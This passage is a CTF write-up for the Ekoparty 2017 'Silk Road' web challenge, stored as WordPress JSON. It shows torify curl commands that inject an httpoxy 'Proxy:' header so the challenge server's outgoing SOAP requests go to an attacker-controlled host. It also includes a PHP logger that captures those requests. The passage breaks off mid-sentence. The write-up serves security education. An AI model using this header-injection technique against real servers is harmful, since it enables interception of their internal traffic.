{"id":14695,"date":"2017-09-21T15:51:15","date_gmt":"2017-09-21T13:51:15","guid":{"rendered":"https:\/\/codisec.com\/?p=14695"},"modified":"2023-03-22T16:29:56","modified_gmt":"2023-03-22T15:29:56","slug":"ekoparty-2017-silk-road","status":"publish","type":"post","link":"https:\/\/codisec.com\/ekoparty-2017-silk-road\/","title":{"rendered":"Ekoparty 2017: Silk Road"},"content":{"rendered":"

CTF: EKOPARTY 2017
\nPoints: 496
\nCategory: Web<\/p>\n

Description<\/h2>\n

“We will never make the same mistakes again, we challenge you to read our messages and earn some BTCs!” – DPR <\/p>\n

https:\/\/silkroadzpvwzxxv.onion\/<\/p><\/blockquote>\n

In this web challenge we\u2019re presented with a website in TOR network. To access it we can use Tor Browser<\/a> and torify for command line tools like curl:<\/p>\n

torify curl -v -k \"https:\/\/silkroadzpvwzxxv.onion\/\"<\/pre>\n
The website consists of two pages:<\/p>\n
1) Login panel:<\/p>\n
\"\"<\/p>\n
2) Registration panel at \/register that turns out to be disabled…<\/p>\n
\"\"<\/p>\n
Testing for common vulnerabilities like SQL Injection does not provide anything useful.
\nLet\u2019s take a look at headers: <\/p>\n
$ torify curl -I -k \"https:\/\/silkroadzpvwzxxv.onion\/\"\r\nHTTP\/1.1 200 OK\r\nDate: Mon, 18 Sep 2017 11:10:02 GMT\r\nServer: Apache\r\nSet-Cookie: PHPSESSID=rsg6p15vnm7quglb9kte9e9sb0; path=\/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate\r\nPragma: no-cache\r\nX-Powered-By: PHP\/7.0.8\r\nContent-Type: text\/html; charset=UTF-8<\/pre>\n
The interesting thing here is the PHP version, let\u2019s try to find some vulnerabilities.
\nSearching for php 7.0.8 vulnerability<\/code> in google leads us to something very interesting:
\nhttp:\/\/www.securiteam.com\/securitynews\/5YP321PJQC.html<\/a><\/p>\n
More about this vulnerability:
\nhttps:\/\/httpoxy.org\/<\/a><\/p>\n
Quick test:<\/p>\n
$ torify curl -v -k \"https:\/\/silkroadzpvwzxxv.onion\/\" -H \"Proxy: google.com\"\r\n\u2026\r\nHTTP\/1.0 500 Internal Server Error\r\n\u2026<\/pre>\n
Excellent! We crashed the application!<\/p>\n
Now let\u2019s setup amazon instance with Tinyproxy and set it to redirect traffic to local Apache server. The requests are made with HTTPS, so we\u2019ll also need a domain (free from No-IP<\/a>) and SSL certificate (also free from Let’s Encrypt<\/a>)<\/p>\n
After successfully setting up our server let\u2019s see what requests are being sent:<\/p>\n
$ torify curl -k \"https:\/\/silkroadzpvwzxxv.onion\/\" -H \"Proxy: ourserver.hopto.org\"<\/pre>\n
Now we can take a look at \/var\/log\/apache2\/access.log<\/code> on our server and see:<\/p>\n
127.0.0.1 - - [18\/Sep\/2017:11:39:29 +0000] \"POST \/d90cdc7988b15060c1896126cee2eae9\/hiddenservice_ws.php HTTP\/1.1\" 404 3750 \"-\" \"PHP-SOAP\/7.0.22-0ubuntu0.17.04.1\"<\/pre>\n
\/d90cdc7988b15060c1896126cee2eae9\/hiddenservice_ws.php<\/code> is a valid path in challenge website, but when called with GET<\/code> it only returns an empty page. Let\u2019s now create a file \/d90cdc7988b15060c1896126cee2eae9\/hiddenservice_ws.php<\/code> in our webserver and see what requests are coming from challenge\u2019s server:<\/p>\n
 $val)\r\n{\r\n\t$req_dump.= \"$key : $val \\n\";\r\n}\r\n\r\n$req_dump.= \"\\n\" . print_r(file_get_contents('php:\/\/input') , TRUE);\r\n$fp = fopen('request.log', 'a');\r\nfwrite($fp, $req_dump);\r\nfclose($fp);\r\n?><\/pre>\n
After making request with Proxy<\/code> header once again we can see the contents of request in request.log:<\/p>\n
Host : hiddenservicehost \r\nConnection : close \r\nUser-Agent : PHP-SOAP\/7.0.22-0ubuntu0.17.04.1 \r\nContent-Type : text\/xml; charset=utf-8 \r\nSOAPAction : \"https:\/\/hiddenservicehost\/d90cdc7988b15060c1896126cee2eae9\/getCaptchaWord\" \r\nContent-Length : 655 \r\n\r\n\r\n\r\n  \r\n    \r\n      6FF45265-5073-8C1B-1BE4-8DD77E546EE0<\/guid>\r\n      127.0.0.1<\/IP>\r\n      6<\/length>\r\n    <\/ns1:getCaptchaWord>\r\n  <\/SOAP-ENV:Body>\r\n<\/SOAP-ENV:Envelope><\/pre>\n
Turns out hiddenservice_ws.php<\/code> serves SOAP API, and the query itself is used to generate captcha word. Fun fact – the original Silk Road was tracked down by leaky captcha (at least FBI claims so…), more about it: https:\/\/krebsonsecurity.com\/2014\/09\/dread-pirate-sunk-by-leaky-captcha\/<\/a> – nice try Ekoparty ;).
\nNow with our proxy hack we can:<\/p>\n